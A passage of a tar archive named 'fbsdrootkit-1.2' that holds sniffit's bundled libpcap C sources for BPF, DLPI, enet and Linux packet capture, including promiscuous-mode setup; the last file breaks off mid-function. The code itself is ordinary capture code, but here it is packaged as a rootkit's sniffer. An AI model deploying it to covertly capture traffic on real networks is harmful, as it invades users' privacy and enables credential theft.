malloc an array to map * block number to block. Then, put the blocks into the array. */ unMarkAll(); n = count_blocks(root); blocks = (struct block **)malloc(n * sizeof(*blocks)); unMarkAll(); n_blocks = 0; number_blks_r(root); n_edges = 2 * n_blocks; edges = (struct edge **)malloc(n_edges * sizeof(*edges)); /* * The number of levels is bounded by the number of nodes. */ levels = (struct block **)malloc(n_blocks * sizeof(*levels)); edgewords = n_edges / (8 * sizeof(u_long)) + 1; nodewords = n_blocks / (8 * sizeof(u_long)) + 1; /* XXX */ space = (u_long *)malloc(2 * n_blocks * nodewords * sizeof(*space) + n_edges * edgewords * sizeof(*space)); p = space; all_dom_sets = p; for (i = 0; i < n; ++i) { blocks[i]->dom = p; p += nodewords; } all_closure_sets = p; for (i = 0; i < n; ++i) { blocks[i]->closure = p; p += nodewords; } all_edge_sets = p; for (i = 0; i < n; ++i) { register struct block *b = blocks[i]; b->et.edom = p; p += edgewords; b->ef.edom = p; p += edgewords; b->et.id = i; edges[i] = &b->et; b->ef.id = n_blocks + i; edges[n_blocks + i] = &b->ef; b->et.pred = b; b->ef.pred = b; } max_stmts = 0; for (i = 0; i < n; ++i) max_stmts += slength(blocks[i]->stmts) + 1; /* * We allocate at most 3 value numbers per statement, * so this is an upper bound on the number of valnodes * we'll need. */ maxval = 3 * max_stmts; vmap = (struct vmapinfo *)malloc(maxval * sizeof(*vmap)); vnode_base = (struct valnode *)malloc(maxval * sizeof(*vmap)); } /* * Some pointers used to convert the basic block form of the code, * into the array form that BPF requires. 'fstart' will point to * the malloc'd array while 'ftail' is used during the recursive traversal. */ static struct bpf_insn *fstart; static struct bpf_insn *ftail; #ifdef BDEBUG int bids[1000]; #endif static void convert_code_r(p) struct block *p; { struct bpf_insn *dst; struct slist *src; int slen; u_int off; if (p == 0 || isMarked(p)) return; Mark(p); convert_code_r(JF(p)); convert_code_r(JT(p)); slen = slength(p->stmts); dst = ftail -= slen + 1; p->offset = dst - fstart; for (src = p->stmts; src; src = src->next) { if (src->s.code == NOP) continue; dst->code = (u_short)src->s.code; dst->k = src->s.k; ++dst; } #ifdef BDEBUG bids[dst - fstart] = p->id + 1; #endif dst->code = (u_short)p->s.code; dst->k = p->s.k; if (JT(p)) { off = JT(p)->offset - (p->offset + slen) - 1; if (off >= 256) bpf_error("long jumps not supported"); dst->jt = off; off = JF(p)->offset - (p->offset + slen) - 1; if (off >= 256) bpf_error("long jumps not supported"); dst->jf = off; } } /* * Convert flowgraph intermediate representation to the * BPF array representation. Set *lenp to the number of instructions. */ struct bpf_insn * icode_to_fcode(root, lenp) struct block *root; int *lenp; { int n; struct bpf_insn *fp; unMarkAll(); n = *lenp = count_stmts(root); fp = (struct bpf_insn *)malloc(sizeof(*fp) * n); memset((char *)fp, 0, sizeof(*fp) * n); fstart = fp; ftail = fp + n; unMarkAll(); convert_code_r(root); return fp; } #ifdef BDEBUG opt_dump(root) struct block *root; { struct bpf_program f; memset(bids, 0, sizeof bids); f.bf_insns = icode_to_fcode(root, &f.bf_len); bpf_dump(&f, 1); putchar('\n'); free((char *)f.bf_insns); } #endif fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-bpf.c100400 764 764 12740 6226213211 16520 0ustar dfdf/* * Copyright (c) 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ #ifndef lint static char rcsid[] = "@(#)$Header: pcap-bpf.c,v 1.14 94/06/03 19:58:49 leres Exp $ (LBL)"; #endif #include #include #include #include #include #include /* optionally get BSD define */ #include #include #include #include #include #include #include #include #include "pcap-int.h" int pcap_stats(pcap_t *p, struct pcap_stat *ps) { struct bpf_stat s; if (ioctl(p->fd, BIOCGSTATS, &s) < 0) { sprintf(p->errbuf, "BIOCGSTATS: %s", pcap_strerror(errno)); return (-1); } ps->ps_recv = s.bs_recv; ps->ps_drop = s.bs_drop; return (0); } int pcap_read(pcap_t *p, int cnt, pcap_handler callback, u_char *user) { int cc; int n = 0; register u_char *bp, *ep; again: cc = p->cc; if (p->cc == 0) { cc = read(p->fd, (char *)p->buffer, p->bufsize); if (cc < 0) { /* Don't choke when we get ptraced */ switch (errno) { case EINTR: goto again; case EWOULDBLOCK: return (0); #if defined(sun) && !defined(BSD) /* * Due to a SunOS bug, after 2^31 bytes, the kernel * file offset overflows and read fails with EINVAL. * The lseek() to 0 will fix things. */ case EINVAL: if ((long)(tell(p->fd) + p->bufsize) < 0) { (void)lseek(p->fd, 0, 0); goto again; } /* fall through */ #endif } sprintf(p->errbuf, "read: %s", pcap_strerror(errno)); return (-1); } bp = p->buffer; } else bp = p->bp; /* * Loop through each packet. */ #define bhp ((struct bpf_hdr *)bp) ep = bp + cc; while (bp < ep) { register int caplen, hdrlen; caplen = bhp->bh_caplen; hdrlen = bhp->bh_hdrlen; /* * XXX A bpf_hdr matches a pcap_pkthdr. */ (*callback)(user, (struct pcap_pkthdr*)bp, bp + hdrlen); bp += BPF_WORDALIGN(caplen + hdrlen); if (++n >= cnt && cnt > 0) { p->bp = bp; p->cc = ep - bp; return (n); } } #undef bhp p->cc = 0; return (n); } static inline int bpf_open(pcap_t *p, char *errbuf) { int fd; int n = 0; char device[sizeof "/dev/bpf000"]; /* * Go through all the minors and find one that isn't in use. */ do { (void)sprintf(device, "/dev/bpf%d", n++); fd = open(device, O_RDONLY); } while (fd < 0 && errno == EBUSY); /* * XXX better message for all minors used */ if (fd < 0) sprintf(errbuf, "%s: %s", device, pcap_strerror(errno)); return (fd); } pcap_t * pcap_open_live(char *device, int snaplen, int promisc, int to_ms, char *ebuf) { int fd; struct ifreq ifr; struct bpf_version bv; u_int v; pcap_t *p; p = (pcap_t *)malloc(sizeof(*p)); if (p == NULL) { sprintf(ebuf, "malloc: %s", pcap_strerror(errno)); return (NULL); } bzero(p, sizeof(*p)); fd = bpf_open(p, ebuf); if (fd < 0) goto bad; p->fd = fd; p->snapshot = snaplen; if (ioctl(fd, BIOCVERSION, (caddr_t)&bv) < 0) { sprintf(ebuf, "BIOCVERSION: %s", pcap_strerror(errno)); goto bad; } if (bv.bv_major != BPF_MAJOR_VERSION || bv.bv_minor < BPF_MINOR_VERSION) { sprintf(ebuf, "kernel bpf filter out of date"); goto bad; } (void)strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name)); if (ioctl(fd, BIOCSETIF, (caddr_t)&ifr) < 0) { sprintf(ebuf, "%s: %s", device, pcap_strerror(errno)); goto bad; } /* Get the data link layer type. */ if (ioctl(fd, BIOCGDLT, (caddr_t)&v) < 0) { sprintf(ebuf, "BIOCGDLT: %s", pcap_strerror(errno)); goto bad; } p->linktype = v; /* set timeout */ if (to_ms != 0) { struct timeval to; to.tv_sec = to_ms / 1000; to.tv_usec = (to_ms * 1000) % 1000000; if (ioctl(p->fd, BIOCSRTIMEOUT, (caddr_t)&to) < 0) { sprintf(ebuf, "BIOCSRTIMEOUT: %s", pcap_strerror(errno)); goto bad; } } if (promisc) /* set promiscuous mode, okay if it fails */ (void)ioctl(p->fd, BIOCPROMISC, NULL); if (ioctl(fd, BIOCGBLEN, (caddr_t)&v) < 0) { sprintf(ebuf, "BIOCGBLEN: %s", pcap_strerror(errno)); goto bad; } p->bufsize = v; p->buffer = (u_char*)malloc(p->bufsize); if (p->buffer == NULL) { sprintf(ebuf, "malloc: %s", pcap_strerror(errno)); goto bad; } return (p); bad: free(p); return (NULL); } int pcap_setfilter(pcap_t *p, struct bpf_program *fp) { if (p->sf.rfile != NULL) p->fcode = *fp; else if (ioctl(p->fd, BIOCSETF, (caddr_t)fp) < 0) { sprintf(p->errbuf, "BIOCSETF: %s", pcap_strerror(errno)); return (-1); } return (0); } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-dlpi.c100600 764 764 26414 6226213211 16706 0ustar dfdf/* * Copyright (c) 1993, 1994, 1995 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. * * This code contributed by Atanu Ghosh (atanu@cs.ucl.ac.uk), * University College London. */ #ifndef lint static char rcsid[] = "@(#)$Header: pcap-dlpi.c,v 1.22+ 94/10/12 20:08:15 leres Exp $ (LBL)"; #endif /* * Packet capture routine for dlpi under SunOS 5 * * Notes: * * - Apparently the DLIOCRAW ioctl() is specific to SunOS. * * - There is a bug in bufmod(7) such that setting the snapshot * length results in data being left of the front of the packet. * * - It might be desirable to use pfmod(7) to filter packets in the * kernel. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcap-int.h" #define MAXDLBUF 8192 /* Forwards */ static int send_request(int, char *, int, char *, char *); static int dlattachreq(int, u_long, char *); static int dlinfoack(int, char *, char *); static int dlinforeq(int, char *); static int dlpromisconreq(int, u_long, char *); static int dlokack(int, char *, char *); static int strioctl(int, int, int, char *); #ifdef SOLARIS static char *getrelease(long *, long *, long *); #endif int pcap_stats(pcap_t *p, struct pcap_stat *ps) { *ps = p->md.stat; return (0); } int pcap_read(pcap_t *p, int cnt, pcap_handler callback, u_char *user) { register int cc, n; register u_char *bp, *ep, *pk; register struct bpf_insn *fcode; register struct sb_hdr *sbp; int flags; struct strbuf data; struct pcap_pkthdr pkthdr; flags = 0; cc = p->cc; if (cc == 0) { data.buf = (char *)p->buffer; data.maxlen = MAXDLBUF; data.len = 0; do { if (getmsg(p->fd, NULL, &data, &flags) < 0) { /* Don't choke when we get ptraced */ if (errno == EINTR) { cc = 0; continue; } strcpy(p->errbuf, pcap_strerror(errno)); return (-1); } cc = data.len; } while (cc == 0); bp = p->buffer; } else bp = p->bp; /* Loop through packets */ fcode = p->fcode.bf_insns; ep = bp + cc; n = 0; while (bp < ep) { sbp = (struct sb_hdr *)bp; p->md.stat.ps_drop += sbp->sbh_drops; ++p->md.stat.ps_recv; pk = bp + sizeof(*sbp); bp += sbp->sbh_totlen; if (bpf_filter(fcode, pk, sbp->sbh_origlen, sbp->sbh_msglen)) { pkthdr.ts = sbp->sbh_timestamp; pkthdr.len = sbp->sbh_origlen; pkthdr.caplen = sbp->sbh_msglen; /* Insure caplen does not exceed snapshot */ if (pkthdr.caplen > p->snapshot) pkthdr.caplen = p->snapshot; (*callback)(user, &pkthdr, pk); if (++n >= cnt && cnt >= 0) { p->cc = ep - bp; p->bp = bp; return (n); } } } p->cc = 0; return (n); } pcap_t * pcap_open_live(char *device, int snaplen, int promisc, int to_ms, char *ebuf) { register pcap_t *p; long buf[MAXDLBUF]; int ppa; int cppa; register dl_info_ack_t *infop; u_long ss, flag; #ifdef SOLARIS char *release; long osmajor, osminor, osmicro; #endif char dname[100]; p = (pcap_t *)malloc(sizeof(*p)); if (p == NULL) { strcpy(ebuf, pcap_strerror(errno)); return (NULL); } memset(p, 0, sizeof(*p)); /* ** 1) In order to get the ppa take the last character of the device ** name if it is a number then fail the open. ** ** 2) If the name starts with a '/' then this is an absolute pathname, ** otherwise prepend '/dev/'. ** ** 3) Remove the trailing digit and try and open the device ** not staggeringly intuitive but it should work. ** ** If there are more than 9 devices this code will fail. */ cppa = device[strlen(device) - 1]; if (!isdigit(cppa)) { sprintf(ebuf, "%c is not a digit, therefore not a valid ppa", cppa); goto bad; } dname[0] = '\0'; if (device[0] != '/') strcpy(dname, "/dev/"); strcat(dname, device); dname[strlen(dname) - 1] = '\0'; if ((p->fd = open(dname, O_RDWR)) < 0) { sprintf(ebuf, "%s: %s", dname, pcap_strerror(errno)); goto bad; } p->snapshot = snaplen; ppa = cppa - '0'; /* ** Attach. */ if (dlattachreq(p->fd, ppa, ebuf) < 0 || dlokack(p->fd, (char *)buf, ebuf) < 0) goto bad; if (promisc) { /* ** enable promiscuous. */ if (dlpromisconreq(p->fd, DL_PROMISC_PHYS, ebuf) < 0 || dlokack(p->fd, (char *)buf, ebuf) < 0) goto bad; if (dlpromisconreq(p->fd, DL_PROMISC_SAP, ebuf) < 0 || dlokack(p->fd, (char *)buf, ebuf) < 0) goto bad; /* ** enable multicast, you would have thought promiscuous ** would be sufficient. */ if (dlpromisconreq(p->fd, DL_PROMISC_MULTI, ebuf) < 0 || dlokack(p->fd, (char *)buf, ebuf) < 0) goto bad; } /* ** Determine link type */ if (dlinforeq(p->fd, ebuf) < 0 || dlinfoack(p->fd, (char *)buf, ebuf) < 0) goto bad; infop = &((union DL_primitives *)buf)->info_ack; switch (infop->dl_mac_type) { case DL_ETHER: p->linktype = DLT_EN10MB; break; case DL_FDDI: p->linktype = DLT_FDDI; break; default: sprintf(ebuf, "unknown mac type 0x%lu", infop->dl_mac_type); goto bad; } #ifdef DLIOCRAW /* ** This is a non standard SunOS hack to get the ethernet header. */ if (strioctl(p->fd, DLIOCRAW, 0, NULL) < 0) { sprintf(ebuf, "DLIOCRAW: %s", pcap_strerror(errno)); goto bad; } #endif /* ** Another non standard call to get the data nicely buffered */ if (ioctl(p->fd, I_PUSH, "bufmod") != 0) { sprintf(ebuf, "I_PUSH bufmod: %s", pcap_strerror(errno)); goto bad; } /* ** Now that the bufmod is pushed lets configure it. ** ** There is a bug in bufmod(7). When dealing with messages of ** less than snaplen size it strips data from the beginning not ** the end. ** ** This bug is supposed to be fixed in 5.3.2. Also, there is a ** patch available. Ask for bugid 1149065. */ ss = snaplen; #ifdef SOLARIS release = getrelease(&osmajor, &osminor, &osmicro); if (osmajor == 5 && (osminor <= 2 || (osminor == 3 && osmicro < 2)) && getenv("BUFMOD_FIXED") == NULL) { fprintf(stderr, "WARNING: bufmod is broken in SunOS %s; ignoring snaplen.\n", release); ss = 0; } #endif if (ss > 0 && strioctl(p->fd, SBIOCSSNAP, sizeof(u_long), (char *)&ss) != 0) { sprintf(ebuf, "SBIOCSSNAP: %s", pcap_strerror(errno)); goto bad; } /* ** Set up the bufmod flags */ if (strioctl(p->fd, SBIOCGFLAGS, sizeof(u_long), (char *)&flag) < 0) { sprintf(ebuf, "SBIOCGFLAGS: %s", pcap_strerror(errno)); goto bad; } flag |= SB_NO_DROPS; if (strioctl(p->fd, SBIOCSFLAGS, sizeof(u_long), (char *)&flag) != 0) { sprintf(ebuf, "SBIOCSFLAGS: %s", pcap_strerror(errno)); goto bad; } /* ** Set up the bufmod timeout */ if (to_ms != 0) { struct timeval to; to.tv_sec = to_ms / 1000; to.tv_usec = (to_ms * 1000) % 1000000; if (strioctl(p->fd, SBIOCSTIME, sizeof(to), (char *)&to) != 0) { sprintf(ebuf, "SBIOCSTIME: %s", pcap_strerror(errno)); goto bad; } } /* ** As the last operation flush the read side. */ if (ioctl(p->fd, I_FLUSH, FLUSHR) != 0) { sprintf(ebuf, "FLUSHR: %s", pcap_strerror(errno)); goto bad; } /* Allocate data buffer */ p->bufsize = MAXDLBUF * sizeof(long); p->buffer = (u_char *)malloc(p->bufsize); return (p); bad: free(p); return (NULL); } int pcap_setfilter(pcap_t *p, struct bpf_program *fp) { p->fcode = *fp; return (0); } static int send_request(int fd, char *ptr, int len, char *what, char *ebuf) { struct strbuf ctl; int flags; ctl.maxlen = 0; ctl.len = len; ctl.buf = ptr; flags = 0; if (putmsg(fd, &ctl, (struct strbuf *) NULL, flags) < 0) { sprintf(ebuf, "putmsg \"%s\"failed: %s", what, pcap_strerror(errno)); return (-1); } return (0); } static int dlattachreq(int fd, u_long ppa, char *ebuf) { dl_attach_req_t req; req.dl_primitive = DL_ATTACH_REQ; req.dl_ppa = ppa; return (send_request(fd, (char *)&req, sizeof(req), "attach", ebuf)); } static int dlpromisconreq(int fd, u_long level, char *ebuf) { dl_promiscon_req_t req; req.dl_primitive = DL_PROMISCON_REQ; req.dl_level = level; return (send_request(fd, (char *)&req, sizeof(req), "promiscon", ebuf)); } static int dlokack(int fd, char *bufp, char *ebuf) { union DL_primitives *dlp; struct strbuf ctl; int flags; ctl.maxlen = MAXDLBUF; ctl.len = 0; ctl.buf = bufp; flags = 0; if (getmsg(fd, &ctl, (struct strbuf*)NULL, &flags) < 0) { sprintf(ebuf, "getmsg: %s", pcap_strerror(errno)); return (-1); } dlp = (union DL_primitives *) ctl.buf; if (dlp->dl_primitive != DL_OK_ACK) { sprintf(ebuf, "dlokack unexpected primitive %d", dlp->dl_primitive); return (-1); } if (ctl.len != sizeof(dl_ok_ack_t)) { sprintf(ebuf, "dlokack incorrect size returned"); return (-1); } return (0); } static int dlinforeq(int fd, char *ebuf) { dl_info_req_t req; req.dl_primitive = DL_INFO_REQ; return (send_request(fd, (char *)&req, sizeof(req), "info", ebuf)); } static int dlinfoack(int fd, char *bufp, char *ebuf) { union DL_primitives *dlp; struct strbuf ctl; int flags; ctl.maxlen = MAXDLBUF; ctl.len = 0; ctl.buf = bufp; flags = 0; if (getmsg(fd, &ctl, (struct strbuf *)NULL, &flags) < 0) { sprintf(ebuf, "dlinfoack: getmsg: %s", pcap_strerror(errno)); return (-1); } dlp = (union DL_primitives *) ctl.buf; if (dlp->dl_primitive != DL_INFO_ACK) { sprintf(ebuf, "dlinfoack: unexpected primitive %ld", dlp->dl_primitive); return (-1); } /* Extra stuff like the broadcast address can be returned */ if (ctl.len < DL_INFO_ACK_SIZE) { sprintf(ebuf, "dlinfoack: incorrect size returned"); return (-1); } return (0); } static int strioctl(int fd, int cmd, int len, char *dp) { struct strioctl str; int rc; str.ic_cmd = cmd; str.ic_timout = -1; str.ic_len = len; str.ic_dp = dp; rc = ioctl(fd, I_STR, &str); if (rc < 0) return (rc); else return (str.ic_len); } #ifdef SOLARIS static char * getrelease(long *majorp, long *minorp, long *microp) { char *cp; static char buf[32]; *majorp = 0; *minorp = 0; *microp = 0; if (sysinfo(SI_RELEASE, buf, sizeof(buf)) < 0) return ("?"); cp = buf; if (!isdigit(*cp)) return (buf); *majorp = strtol(cp, &cp, 10); if (*cp++ != '.') return (buf); *minorp = strtol(cp, &cp, 10); if (*cp++ != '.') return (buf); *microp = strtol(cp, &cp, 10); return (buf); } #endif fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-enet.c100400 764 764 11307 6226213211 16702 0ustar dfdf/* * Stanford Enetfilter subroutines for tcpdump * * Based on the MERIT NNstat etherifrt.c and the Ultrix pcap-pf.c * subroutines. * * Rayan Zachariassen, CA*Net */ #include #include #include #include #include #include #include #include #include #include #include #include #include "interface.h" struct packet_header { #ifdef IBMRTPC struct LengthWords length; struct tap_header tap; #endif /* IBMRTPC */ u_char packet[8] }; extern int errno; #define BUFSPACE (4*1024) /* Forwards */ static void efReadError(int, char *); void readloop(int cnt, int if_fd, struct bpf_program *fp, printfunc printit) { #ifdef IBMRTPC register struct packet_header *ph; register u_char *bp; register int inc; #else /* !IBMRTPC */ static struct timeval tv = { 0 }; #endif /* IBMRTPC */ register int cc, caplen; register struct bpf_insn *fcode = fp->bf_insns; union { struct packet_header hdr; u_char p[BUFSPACE]; u_short s; } buf; while (1) { if ((cc = read(if_fd, (char *)buf.p, sizeof(buf))) < 0) efReadError(if_fd, "reader"); #ifdef IBMRTPC /* * Loop through each packet. */ bp = buf.p; while (cc > 0) { ph = (struct packet_header *)bp; caplen = ph->tap.th_wirelen > snaplen ? snaplen : ph->tap .th_wirelen ; if (bpf_filter(fcode, (char *)ph->packet, ph->tap.th_wirelen, caplen)) { if (cnt >= 0 && --cnt < 0) goto out; (*printit)((char *)ph->packet, (struct timeval *)ph->tap.th_timestamp, ph->tap.th_wirelen, caplen); } inc = ph->length.PacketOffset; cc -= inc; bp += inc; } #else /* !IBMRTPC */ caplen = cc > snaplen ? snaplen : cc ; if (bpf_filter(fcode, buf.hdr.packet, cc, caplen)) { if (cnt >= 0 && --cnt < 0) goto out; (*printit)(buf.hdr.packet, &tv, cc, caplen); } #endif /* IBMRTPC */ } out: wrapup(if_fd); } /* Call ONLY if read() has returned an error on packet filter */ static void efReadError(int fid, char *msg) { if (errno == EINVAL) { /* read MAXINT bytes already! */ if (lseek(fid, 0, 0) < 0) { perror("tcpdump: efReadError/lseek"); exit(-1); } else return; } else { (void) fprintf(stderr, "tcpdump: "); perror(msg); exit(-1); } } void wrapup(int fd) { #ifdef IBMRTPC struct enstats es; if (ioctl(fd, EIOSTATS, &es) == -1) { perror("tcpdump: enet ioctl EIOSTATS error"); exit(-1); } fprintf(stderr, "%d packets queued", es.enStat_Rcnt); if (es.enStat_Rdrops > 0) fprintf(stderr, ", %d dropped", es.enStat_Rdrops); if (es.enStat_Reads > 0) fprintf(stderr, ", %d tcpdump %s", es.enStat_Reads, es.enStat_Reads > 1 ? "reads" : "read"); if (es.enStat_MaxRead > 1) fprintf(stderr, ", %d packets in largest read", es.enStat_MaxRead); putc('\n', stderr); #endif /* IBMRTPC */ close(fd); } int initdevice(char *device, int pflag, int *linktype) { struct eniocb ctl; struct enfilter filter; u_int maxwaiting; int if_fd; #ifdef IBMRTPC GETENETDEVICE(0, O_RDONLY, &if_fd); #else /* !IBMRTPC */ if_fd = open("/dev/enet", O_RDONLY, 0); #endif /* IBMRTPC */ if (if_fd == -1) { perror("tcpdump: enet open error"); error( "your system may not be properly configured; see \"man enet(4)\""); exit(-1); } /* Get operating parameters. */ if (ioctl(if_fd, EIOCGETP, (char *)&ctl) == -1) { perror("tcpdump: enet ioctl EIOCGETP error"); exit(-1); } /* Set operating parameters. */ #ifdef IBMRTPC ctl.en_rtout = 1 * ctl.en_hz; ctl.en_tr_etherhead = 1; ctl.en_tap_network = 1; ctl.en_multi_packet = 1; ctl.en_maxlen = BUFSPACE; #else /* !IBMRTPC */ ctl.en_rtout = 64; /* randomly picked value for HZ */ #endif /* IBMRTPC */ if (ioctl(if_fd, EIOCSETP, &ctl) == -1) { perror("tcpdump: enet ioctl EIOCSETP error"); exit(-1); } /* Flush the receive queue, since we've changed the operating parameters and we otherwise might receive data without headers. */ if (ioctl(if_fd, EIOCFLUSH) == -1) { perror("tcpdump: enet ioctl EIOCFLUSH error"); exit(-1); } /* Set the receive queue depth to its maximum. */ maxwaiting = ctl.en_maxwaiting; if (ioctl(if_fd, EIOCSETW, &maxwaiting) == -1) { perror("tcpdump: enet ioctl EIOCSETW error"); exit(-1); } #ifdef IBMRTPC /* Clear statistics. */ if (ioctl(if_fd, EIOCLRSTAT, 0) == -1) { perror("tcpdump: enet ioctl EIOCLRSTAT error"); exit(-1); } #endif /* IBMRTPC */ /* Set the filter (accept all packets). */ filter.enf_Priority = 3; filter.enf_FilterLen = 0; if (ioctl(if_fd, EIOCSETF, &filter) == -1) { perror("tcpdump: enet ioctl EIOCSETF error"); exit(-1); } /* * "enetfilter" supports only ethernets. */ *linktype = DLT_EN10MB; return(if_fd); } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-int.h100400 764 764 5650 6226213211 16532 0ustar dfdf/* * Copyright (c) 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the Computer Systems * Engineering Group at Lawrence Berkeley Laboratory. * 4. Neither the name of the University nor of the Laboratory may be used * to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#) $Header: pcap-int.h,v 1.7 94/06/14 20:03:33 leres Exp $ (LBL) */ #ifndef pcap_int_h #define pcap_int_h #include /* * Savefile */ struct pcap_sf { FILE *rfile; int swapped; int version_major; int version_minor; u_char *base; }; struct pcap_md { struct pcap_stat stat; #ifdef PCAP_PF int use_bpf; u_long TotPkts; /* can't oflow for 79 hrs on ether */ u_long TotAccepted; /* count accepted by filter */ u_long TotDrops; /* count of dropped packets */ long TotMissed; /* missed by i/f during this run */ long OrigMissed; /* missed by i/f before this run */ #endif }; struct pcap { int fd; int snapshot; int linktype; int tzoff; /* timezone offset */ struct pcap_sf sf; struct pcap_md md; /* * Read buffer. */ int bufsize; u_char *buffer; u_char *bp; int cc; /* * Place holder for pcap_next(). */ u_char *pkt; /* * Placeholder for filter code if bpf not in kernel. */ struct bpf_program fcode; char errbuf[PCAP_ERRBUF_SIZE]; }; /* XXX should these be in pcap.h? */ int pcap_offline_read(pcap_t *, int, pcap_handler, u_char *); int pcap_read(pcap_t *, int cnt, pcap_handler, u_char *); #endif fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-linux.c100600 764 764 10520 6226213211 17104 0ustar dfdf/* * Linux interface for packet capture lib * ported by Adam Caldwell (acaldwel@ace.cs.ohiou.edu) * Based on the pcap-snoop.c file * May be freely redistributed as per the GNU license */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcap-int.h" static char snoop_device[255]; struct ifreq ifr_orig; void restore_interface() { int fd; fd = socket(PF_INET, SOCK_PACKET, htons(0x0003)); if (fd < 0) { printf("Warning: could not restore interface to normal.\n"); return; } if (ioctl(fd, SIOCSIFFLAGS, &ifr_orig)<0) printf("Warning: could not restore interface to normal.\n"); } int pcap_read(pcap_t *p, int cnt, pcap_handler callback, u_char *user) { register int datalen; register int caplen; struct sockaddr from; int from_len; char *buf; int bufsize; if (p->linktype == DLT_SLIP) { buf = (char *)p->buffer+16; bufsize = p->bufsize - 16; memset(p->buffer,0,16); } else if (p->linktype == DLT_PPP) { buf = (char *)p->buffer+4; bufsize = p->bufsize - 4; memset(p->buffer,0,4); } else { buf = (char *)p->buffer; bufsize = p->bufsize; } do { from_len = sizeof(from); datalen = recvfrom(p->fd,buf,bufsize,0,&from,&from_len); if (datalen < 0) { switch (errno) { case EWOULDBLOCK: return (0); } sprintf(p->errbuf, "read: %s", pcap_strerror(errno)); return (-1); } } while (strcmp(snoop_device,from.sa_data)); /* go until we find something from the right interface */ if (p->linktype == DLT_SLIP) datalen+=16; else if (p->linktype == DLT_PPP) datalen+=4; caplen = (datalen > p->bufsize) ? datalen : p->bufsize; if (caplen > p->snapshot) caplen = p->snapshot; if (p->fcode.bf_insns == NULL || bpf_filter(p->fcode.bf_insns, (char *)p->buffer, datalen, caplen)) { struct pcap_pkthdr h; ++p->md.stat.ps_recv; #ifdef SIOCGSTAMP if (ioctl(p->fd,SIOCGSTAMP,&h.ts)<0) /* ask for the timestamp */ #endif gettimeofday(&h.ts,0); h.len = datalen; h.caplen = caplen; (*callback)(user, &h, (char *)p->buffer); return (1); } return (0); } int pcap_stats(pcap_t *p, struct pcap_stat *ps) { ps->ps_drop = 0; ps->ps_recv = p->md.stat.ps_recv; ps->ps_ifdrop = 0; return (0); } pcap_t * pcap_open_live(char *device, int snaplen, int promisc, int to_ms, char *ebuf) { pcap_t *p; struct ifreq ifr; p = (pcap_t *)malloc(sizeof(*p)); if (p == NULL) { strcpy(ebuf, "no swap"); return (0); } bzero(p, sizeof(*p)); if (strncmp("et", device, 2) == 0) p->linktype = DLT_EN10MB; else if (strncmp("sl", device, 2) == 0) p->linktype = DLT_SLIP; else if (strncmp("pp", device, 2) == 0) p->linktype = DLT_PPP; else { sprintf(ebuf, "snoop: unknown physical layer type"); goto bad; } p->fd = -1; p->bufsize = 4096; p->buffer = (u_char *)malloc(p->bufsize); if (p->buffer == NULL) { strcpy(ebuf, "no swap"); goto bad; } p->fd = socket(PF_INET, SOCK_PACKET, htons(0x0003)); if (p->fd < 0) { sprintf(ebuf, "snoop socket: %s", pcap_strerror(errno)); goto bad; } if (p->linktype != DLT_SLIP && p->linktype != DLT_PPP && promisc) { strcpy(ifr.ifr_name, device); /* 